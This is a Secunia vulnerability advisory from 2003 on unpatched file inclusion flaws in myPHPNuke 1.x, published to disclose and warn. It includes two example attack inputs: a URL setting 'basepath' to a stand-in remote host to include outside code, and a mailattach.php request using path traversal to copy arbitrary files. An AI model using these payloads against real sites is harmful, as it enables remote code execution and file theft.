|
myPHPNuke Arbitrary File Inclusion Vulnerability
|
|
Secunia Advisory:
|
SA9721
|
|
|
Release Date:
|
2003-09-12
|
|
Popularity:
|
7,099 views
|
|
|
Critical:
|
Highly critical
|
|
Impact:
|
System access
|
|
Where:
|
From remote
|
|
Solution Status:
|
Unpatched
|
|
| Software: | myPHPNuke 1.x
|
|
|
Subscribe:
|
Instant alerts on relevant vulnerabilities 
|
|
Description:
Multiple vulnerabilities have been identified in myPHPNuke allowing malicious people to include and execute arbitrary code.
One problem is that the script "Gallery/displayCategory.php" doesn't verify the "basepath" and "adminpath" parameters before using them. This allows malicious people to include arbitrary files from remote servers.
Example:
Gallery/displayCategory.php?basepath=http://evil_site
The other problem is that the mail attach function doesn't verify file names properly. This allows malicious users to include arbitrary remote and local files.
Example copying "path_to/any_file" into "mail_me.txt" and attaching it:
mailattach.php?submit=1&attach1=path_to/any_file&attach1_name=../mail_me.txt
The vulnerabilities have been reported in version 1.8.8_7.
Solution:
Edit the souce code so that user input is properly verified before being used.
Provided and/or discovered by:
frog-m@n
Original Advisory:
http://www.phpsecure.info/v2/tutos/myPHPNuke.txt
|
|
|
Track this Secunia Advisory
|
Customers of the Secunia Vulnerability Intelligence solutions will automatically receive updates when new information regarding this advisory is released.
Read more about our Vulnerability Intelligence solutions and what they can do for you and your company.
|
|
|
About this Secunia Advisory
|
Please note: The information that this Secunia Advisory is based on comes from a third party unless stated otherwise.
Secunia collects, validates, and verifies all vulnerability reports issued by security research groups, vendors, and others.
|
